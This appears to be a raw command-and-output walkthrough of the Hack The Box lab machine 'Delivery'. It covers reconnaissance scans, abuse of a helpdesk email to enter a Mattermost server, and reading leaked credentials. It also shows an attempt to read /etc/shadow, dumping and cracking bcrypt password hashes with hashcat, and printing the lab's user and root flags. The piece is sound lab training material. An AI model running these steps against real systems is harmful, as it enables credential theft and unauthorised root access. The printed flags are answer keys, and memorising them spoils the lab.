$ echo "10.10.10.222 delivery.htb" | sudo tee -a /etc/hosts
$ echo "10.10.10.222 helpdesk.delivery.htb" | sudo tee -a /etc/hosts
$ sudo nmap -p- -T4 -A 10.10.10.222
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
| 256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_ 256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome
8065/tcp open unknown
| fingerprint-strings:
| GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Accept-Ranges: bytes
| Cache-Control: no-cache, max-age=31556926, public
| Content-Length: 3108
| Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
| Content-Type: text/html; charset=utf-8
| Last-Modified: Tue, 13 Apr 2021 04:55:33 GMT
| X-Frame-Options: SAMEORIGIN
| X-Request-Id: m8cge3fo5bfr7gr9wwksgbrufe
| X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
| Date: Tue, 13 Apr 2021 13:18:21 GMT
| <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Date: Tue, 13 Apr 2021 13:18:22 GMT
|_ Content-Length: 0
Mattermost: http://delivery.htb:8065/login;
Support Center: http://helpdesk.delivery.htb/index.php;
osTicket: http://helpdesk.delivery.htb/scp/login.php
$ nikto -h http://helpdesk.delivery.htb/
+ Server: nginx/1.14.2
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ 7865 requests: 0 error(s) and 4 item(s) reported on remote host
$ dirb http://helpdesk.delivery.htb/
---- Scanning URL: http://helpdesk.delivery.htb/ ----
==> DIRECTORY: http://helpdesk.delivery.htb/api/
==> DIRECTORY: http://helpdesk.delivery.htb/apps/
==> DIRECTORY: http://helpdesk.delivery.htb/assets/
==> DIRECTORY: http://helpdesk.delivery.htb/css/
==> DIRECTORY: http://helpdesk.delivery.htb/images/
+ http://helpdesk.delivery.htb/index.php (CODE:200|SIZE:5010)
==> DIRECTORY: http://helpdesk.delivery.htb/js/
==> DIRECTORY: http://helpdesk.delivery.htb/kb/
==> DIRECTORY: http://helpdesk.delivery.htb/pages/
+ http://helpdesk.delivery.htb/web.config (CODE:200|SIZE:2197)
---- Entering directory: http://helpdesk.delivery.htb/api/ ----
+ http://helpdesk.delivery.htb/api/.htaccess (CODE:200|SIZE:204)
+ http://helpdesk.delivery.htb/api/index.php (CODE:302|SIZE:0)
+ http://helpdesk.delivery.htb/api/tasks (CODE:400|SIZE:17)
+ http://helpdesk.delivery.htb/api/tickets (CODE:400|SIZE:17)
---- Entering directory: http://helpdesk.delivery.htb/apps/ ----
+ http://helpdesk.delivery.htb/apps/.htaccess (CODE:200|SIZE:211)
---- Entering directory: http://helpdesk.delivery.htb/assets/ ----
==> DIRECTORY: http://helpdesk.delivery.htb/assets/default/
==> DIRECTORY: http://helpdesk.delivery.htb/assets/font/
---- Entering directory: http://helpdesk.delivery.htb/css/ ----
---- Entering directory: http://helpdesk.delivery.htb/images/ ----
==> DIRECTORY: http://helpdesk.delivery.htb/images/captcha/
---- Entering directory: http://helpdesk.delivery.htb/js/ ----
---- Entering directory: http://helpdesk.delivery.htb/kb/ ----
+ http://helpdesk.delivery.htb/kb/index.php (CODE:302|SIZE:0)
---- Entering directory: http://helpdesk.delivery.htb/pages/ ----
+ http://helpdesk.delivery.htb/pages/.htaccess (CODE:200|SIZE:207)
---- Entering directory: http://helpdesk.delivery.htb/assets/default/ ----
==> DIRECTORY: http://helpdesk.delivery.htb/assets/default/css/
==> DIRECTORY: http://helpdesk.delivery.htb/assets/default/images/
---- Entering directory: http://helpdesk.delivery.htb/assets/font/ ----
+ http://helpdesk.delivery.htb/assets/font/index.html (CODE:200|SIZE:882)
---- Entering directory: http://helpdesk.delivery.htb/images/captcha/ ----
---- Entering directory: http://helpdesk.delivery.htb/assets/default/css/ ----
---- Entering directory: http://helpdesk.delivery.htb/assets/default/images/ ----
==> DIRECTORY: http://helpdesk.delivery.htb/assets/default/images/icons/
---- Entering directory: http://helpdesk.delivery.htb/assets/default/images/icons/ ----
$ dirb http://delivery.htb:8065/
---- Scanning URL: http://delivery.htb:8065/ ----
+ http://delivery.htb:8065/robots.txt (CODE:200|SIZE:26)
$ nikto -h http://delivery.htb:8065
+ Server: No banner retrieved
+ IP address found in the 'x-version-id' header. The IP is "5.30.0.5".
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-request-id' found, with contents: einj8gd6kbfz7gaz8wmkznuzbc
+ Uncommon header 'x-version-id' found, with contents: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /deliveryhtb.cer: Potentially interesting archive/cert file found.
+ /deliveryhtb.cer: Potentially interesting archive/cert file found. (NOTE: requested by IP address).
... ...
+ /backup.war: Potentially interesting archive/cert file found. (NOTE: requested by IP address).
+ /site.egg: Potentially interesting archive/cert file found.
+ /site.egg: Potentially interesting archive/cert file found. (NOTE: requested by IP address).
+ /deliveryhtb.tar.lzma: Potentially interesting archive/cert file found.
+ /deliveryhtb.tar.lzma: Potentially interesting archive/cert file found. (NOTE: requested by IP address).
+ /WEB-INF/web.xml: JRUN default file found.
+ 7804 requests: 0 error(s) and 166 item(s) reported on remote host
Register user cpt on http://delivery.htb:8065, then open a ticket on http://helpdesk.delivery.htb/ got ticket number 4630330 tehn register 4630330@delivery.htb on http://delivery.htb:8065, afterwords on http://helpdesk.delivery.htb/ we have:
---- Registration Successful ---- Please activate your email by going to: http://delivery.htb:8065/do_verify_email?token=dhgxuqz6gipn675yxu67azggw1wfxe5orxftxsusjeexsit1e3wtd44fs66x9fiw&email=4630330%40delivery.htb
Open http://delivery.htb:8065/do_verify_email?token=dhgxuqz6gipn675yxu67azggw1wfxe5orxftxsusjeexsit1e3wtd44fs66x9fiw&email=4630330%40delivery.htb
http://delivery.htb:8065/internal/channels/town-square
root
9:29 AM
@developers Please update theme to the OSTicket before we go live. Credentials to the server are maildeliverer:Youve_G0t_Mail!
Also please create a program to help us stop re-using the same passwords everywhere.... Especially those that are a variant of "PleaseSubscribe!"
root
10:58 AM
PleaseSubscribe! may not be in RockYou but if any hacker manages to get our hashes, they can use hashcat rules to easily crack all variations of common words or phrases.
kali@kali:~/0.htb/machines/Delivery$ ssh maildeliverer@10.10.10.222
maildeliverer@10.10.10.222's password:
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Apr 13 10:26:36 2021 from 10.10.14.32
maildeliverer:x:1000:1000:MailDeliverer,,,:/home/maildeliverer:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:110:118:MySQL Server,,,:/nonexistent:/bin/false
mattermost:x:998:998::/home/mattermost:/bin/sh
maildeliverer@Delivery:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied
maildeliverer@Delivery:~$ sudo cat /etc/shadow
[sudo] password for maildeliverer:
maildeliverer is not in the sudoers file. This incident will be reported.
maildeliverer@Delivery:~$ ls
user.txt
maildeliverer@Delivery:~$ cat user.txt
7c2646fea95d7e13c1827941d4a4a208
maildeliverer@Delivery:~$ ls -a
. .. .bash_history .bash_logout .bashrc .config .gnupg .mysql_history .profile user.txt .viminfo
maildeliverer@Delivery:~$
maildeliverer@Delivery:~$ cat .viminfo
# This viminfo file was generated by Vim 8.1.
# You may edit it if you're careful!
# Viminfo version
|1,4
# Value of 'encoding' when this file was written
*encoding=utf-8
# hlsearch on (H) or off (h):
~h
# Last Search Pattern:
~MSle0~/Crack
# Command Line History (newest to oldest):
:q
|2,0,1618302907,,"q"
# Search String History (newest to oldest):
?/Crack
|2,1,1618302852,47,"Crack"
?/crack
|2,1,1618302850,47,"crack"
# Expression History (newest to oldest):
# Input Line History (newest to oldest):
# Debug Line History (newest to oldest):
# Registers:
# File marks:
'0 344 30 /opt/mattermost/config/config.json
|4,48,344,30,1618302907,"/opt/mattermost/config/config.json"
# Jumplist (newest first):
-' 344 30 /opt/mattermost/config/config.json
|4,39,344,30,1618302907,"/opt/mattermost/config/config.json"
-' 1 0 /opt/mattermost/config/config.json
|4,39,1,0,1618302852,"/opt/mattermost/config/config.json"
# History of marks within files (newest to oldest):
> /opt/mattermost/config/config.json
* 1618302906 0
" 344 30
maildeliverer@Delivery:~$
maildeliverer@Delivery:~$ cat .mysql_history
select Password from User where username='root';
use Users
database
;
help
show databases
;
use mattermost;
select Password from User where username='root';
select Password from Users where username='root';
select * from Users where username='root';
select * from Users ;
show databases
;
use information_schema
select * from *;
db.show;
information_schema.show;
show tables;
use mattermost
show tables;
select * from ChannelMemberHistory;
select * from Teams;
select * from Tokens;
select * from GroupMembers;
select * from Commands;
select * from Bots;
select * from Roles;
select * from Reactions;
show database
s
;
show database s;
show database;
show databases;
use mattermost;
show tabels;
show tabel;
show tables;
select * from Users;
show tables;
desc Users;
select Username, Password from Users;
show databases;
use mattermost;
show tables;
desc Users;
select Username, Password from Users;
maildeliverer@Delivery:~$
maildeliverer@Delivery:~$ ls /opt/mattermost/
bin client config data ENTERPRISE-EDITION-LICENSE.txt fonts i18n logs manifest.txt NOTICE.txt plugins prepackaged_plugins README.md templates
maildeliverer@Delivery:~$ ls /opt/mattermost/
maildeliverer@Delivery:/opt/mattermost/config$ cat config.json
"SqlSettings": {
"DriverName": "mysql",
"DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
maildeliverer@Delivery:/opt/mattermost/config$ mysql -u mmuser -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 6303
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
MariaDB [(none)]> use mattermost;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [mattermost]> show tables;
MariaDB [mattermost]> select Username,Password from Users;
+----------------------------------+--------------------------------------------------------------+
| Username | Password |
+----------------------------------+--------------------------------------------------------------+
| flagaflag1 | $2a$10$sOaOc/Kc4ywlWJNf5jZEx.TJD.VUA69DLL9CIEIf.naS0yOTmMuUi |
| test | $2a$10$7vr8mHkCDxmssBXRU90oiep.9s08cTyXLz.mAKkvKPEkNksGUcA8W |
| surveybot | |
| c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK |
| 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G |
| asda | $2a$10$AEOIwPtTFdxB9fFi408azOj6Cs.y1BufO6j9TjMwvaXHfQJvpQbae |
| user2 | $2a$10$cKBYkFLrIbsBcAyOY/pGjeNqdoRT/RVaLq5PbCMYwgmEzcdwBw9rm |
| root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
| pppp | $2a$10$122P8J1ya9OwddUVPNTrgOdFVoOv49IQ9mxcPw5uJNoxQ6ZAZKsSO |
| postbar | $2a$10$zvICVw5//pf3lCk8T2Nt9uGe1pIPuXC7crg06XRBIiDpahEHhlQn6 |
| flag | $2a$10$UtzJFbw2JlqznhpHPiUZhOQ8duaQpNpgg9a/92bfPeAJyZ3XLf9ba |
| flagflags | $2a$10$RqxWtvzB9.t0CcXh7RhfEuv9WGNIibOcpjoK.lZv45QBU2.SbV99e |
| ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq |
| asd | $2a$10$eNe1lZJ3nxmMXC4hclt1VOirSJJ5Pxnx2pSYKwRvnPa4SKPYwMDNq |
| channelexport | |
| 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm |
| cpt | $2a$10$WXLL4yQ62awrHDW.gzwg2OweeKCa4pDJ2YwN9N9lrMYGka/42xTbC |
| flagflag | $2a$10$sWXIaGOtDxIG68zsqmS4vu3I7uD0.aH3L5gUsuP7ueoC9.PmljiwK |
| ppp | $2a$10$156csW8j1RHJ7GeMvOkn4uSIPNg2a2nMpTuD8gm16Vw1VJy96d222 |
| aakk | $2a$10$zwY.fNotl7ycfmtWNP7NLOdS5GZNhvM7F2j2n5NXgKVt2pBlU.jUi |
+----------------------------------+--------------------------------------------------------------+
20 rows in set (0.000 sec)
https://github.com/praetorian-inc/Hob0Rules
https://github.com/hashcat/hashcat/blob/master/rules/best64.rule
hashid
kali@kali:~/0.htb/machines/Delivery$ hashid root.hash
--File 'root.hash'--
Analyzing '$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO'
[+] Blowfish(OpenBSD)
[+] Woltlab Burning Board 4.x
[+] bcrypt
--End of file 'root.hash'--
kali@kali:~/0.htb/machines/Delivery$ hashid
$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO
Analyzing '$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO'
[+] Blowfish(OpenBSD)
[+] Woltlab Burning Board 4.x
[+] bcrypt
kali@kali:~/0.htb/machines/Delivery$ hashcat --help|grep bcrypt
3200 | bcrypt $2*$, Blowfish (Unix) | Operating System
kali@kali:~/0.htb/machines/Delivery$
kali@kali:~/0.htb/machines/Delivery$ hashcat -a 0 -m 3200 ./root.hash ./wordlist.txt -r ./best64.rule
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Xeon(R) CPU E3-1575M v5 @ 3.00GHz, 13889/13953 MB (4096 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77
Applicable optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 65 MB
Dictionary cache built:
* Filename..: ./wordlist.txt
* Passwords.: 1
* Bytes.....: 17
* Keyspace..: 77
* Runtime...: 0 secs
The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework
Approaching final keyspace - workload adjusted.
$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21
Session..........: hashcat
Status...........: Cracked
Hash.Name........: bcrypt $2*$, Blowfish (Unix)
Hash.Target......: $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v...JwgjjO
Time.Started.....: Tue Apr 13 13:06:20 2021 (2 secs)
Time.Estimated...: Tue Apr 13 13:06:22 2021 (0 secs)
Guess.Base.......: File (./wordlist.txt)
Guess.Mod........: Rules (./best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 11 H/s (1.79ms) @ Accel:4 Loops:32 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 21/77 (27.27%)
Rejected.........: 0/21 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:20-21 Iteration:992-1024
Candidates.#1....: PleaseSubscribe!21 -> PleaseSubscribe!21
Started: Tue Apr 13 13:05:32 2021
Stopped: Tue Apr 13 13:06:24 2021
kali@kali:~/0.htb/machines/Delivery$
maildeliverer@Delivery:~$ su - root
Password:
root@Delivery:~# ls
mail.sh note.txt py-smtp.py root.txt
root@Delivery:~#
root@Delivery:~# cat note.txt
I hope you enjoyed this box, the attack may seem silly but it demonstrates a pretty high risk vulnerability I've seen several times. The inspiration for the box is here:
- https://medium.com/intigriti/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c
Keep on hacking! And please don't forget to subscribe to all the security streamers out there.
- ippsec
root@Delivery:~#
root@Delivery:~# cat root.txt
d61c7f66a214ffed57280bd2635edae7
root@Delivery:~# cat mail.sh
#!/bin/bash
if ! pgrep -f py-smtp.py &> /dev/null 2>&1; then
nohup python3 /root/py-smtp.py &
fi
root@Delivery:~#